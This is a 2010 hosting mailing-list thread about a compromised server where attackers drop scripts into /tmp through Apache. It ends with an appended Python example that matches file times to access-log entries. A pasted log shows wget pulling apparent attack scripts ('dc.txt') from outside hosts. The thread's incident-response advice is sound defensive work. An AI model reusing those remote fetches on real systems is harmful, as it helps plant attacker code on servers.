----- Original Message -----
From: "Gerald Waugh" <[email protected]>
To: "BlueOnyx General Mailing List" <[email protected]>
Sent: Monday, November 29, 2010 9:28 AM
Subject: [BlueOnyx:05934] Re: hacker scripts

>
> On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote:
>> On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote:
>> > On 29 Nov 2010, at 17:08, Gerald Waugh wrote:
>> > > How can I stop these people from downloading and running their
>> > > scripts
>> > > in /tmp using httpd
>> >
>> > You need to find out how they did it. You're either hosting someone
>> > naughty, or someone who has an insecure script. Who owns the files?
>> >
>> apache.apache
>>
>> The server has a site with Drupal and some other blog stuff
>>
>
> /tmp type ext3 (rw,noexec,nosuid)
>
>
>
> [Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not exist: /home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526
> --06:02:38-- http://193.136.136.86/quixplorer/readme.txt
>            => `readme.txt'
> Connecting to 193.136.136.86:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 27,931 (27K) [text/plain]
>
>     0K .......... .......... .......   100%  56.99 KB/s
>
> 06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]
>
> --06:02:39-- http://realezsites.com/pers/cowtipper524/dc.txt
>            => `dc.txt'
> Resolving realezsites.com... 64.235.52.10
> Connecting to realezsites.com|64.235.52.10|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 2,140 (2.1K) [text/plain]
>
>     0K ..   100%  2.40 MB/s
>
> 06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140]
>
> --
> Gerald
>

Look at the time the files in the /tmp were created. Then look in your access logs and see what site / php script was accessed at that time.

Check your drupal version and search on Google for "Exploits for Drupal version xxx"

----
Ken M
Precision Web Hosting, Inc.
http://www.precisionweb.net

_______________________________________________
Blueonyx mailing list
[email protected]
http://www.blueonyx.it/mailman/listinfo/blueonyx
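One way to do the correlation Ken describes (file time in /tmp against the web access log), as an added example that is not part of the original thread. It assumes Apache common/combined log format; the sample log lines, the script name `example-upload.php`, the documentation-range client addresses and the -0600 offset are constructed for illustration.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Apache common/combined log format: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def parse_line(line):
    """Return (datetime, host, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return when, m.group("host"), m.group("method"), m.group("path"), int(m.group("status"))

def requests_before(log_lines, dropped_at, window=timedelta(seconds=30)):
    """Successful requests to PHP scripts in the window ending when the file appeared."""
    hits = []
    for line in log_lines:
        rec = parse_line(line)
        if rec is None:
            continue
        when, host, method, path, status = rec
        is_php = path.split("?", 1)[0].endswith(".php")
        if is_php and status < 400 and dropped_at - window <= when <= dropped_at:
            hits.append((when, host, method, path))
    return sorted(hits)

def file_change_time(path, tz=timezone.utc):
    """Inode change time (ctime); unlike mtime it cannot be set with utime()."""
    return datetime.fromtimestamp(os.stat(path).st_ctime, tz)

# Constructed sample data (not from the thread): per-site access log lines.
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Nov/2010:06:01:10 -0600] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [29/Nov/2010:06:02:37 -0600] "POST /blog/example-upload.php?x=1 HTTP/1.1" 200 311',
    '198.51.100.7 - - [29/Nov/2010:06:02:38 -0600] "GET /images/logo.png HTTP/1.1" 200 900',
    '192.0.2.44 - - [29/Nov/2010:06:02:50 -0600] "GET /blog/example-upload.php HTTP/1.1" 200 311',
    'garbage line that does not parse',
]
# Constructed: the time dc.txt appeared, taken as 06:02:39 local (-0600 assumed).
DROPPED_AT = datetime(2010, 11, 29, 6, 2, 39, tzinfo=timezone(timedelta(hours=-6)))

if __name__ == "__main__":
    for when, host, method, path in requests_before(SAMPLE_LOG, DROPPED_AT):
        print(when.isoformat(), host, method, path)
```

On a live server, pass `file_change_time("/tmp/dc.txt", tz)` as `dropped_at` and feed each virtual host's access log in turn; the site whose log yields hits is the one to audit.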
